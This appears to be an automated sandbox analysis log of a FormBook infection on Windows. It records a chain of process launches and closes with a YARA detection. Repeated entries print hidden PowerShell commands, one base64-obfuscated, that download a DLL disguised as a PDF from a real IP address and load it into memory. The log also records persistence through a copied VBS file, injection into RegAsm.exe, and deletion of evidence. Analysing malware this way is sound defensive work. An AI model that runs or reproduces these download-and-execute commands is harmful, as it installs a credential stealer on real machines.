          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.538172691.0000000006100000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.474834868.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
          Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
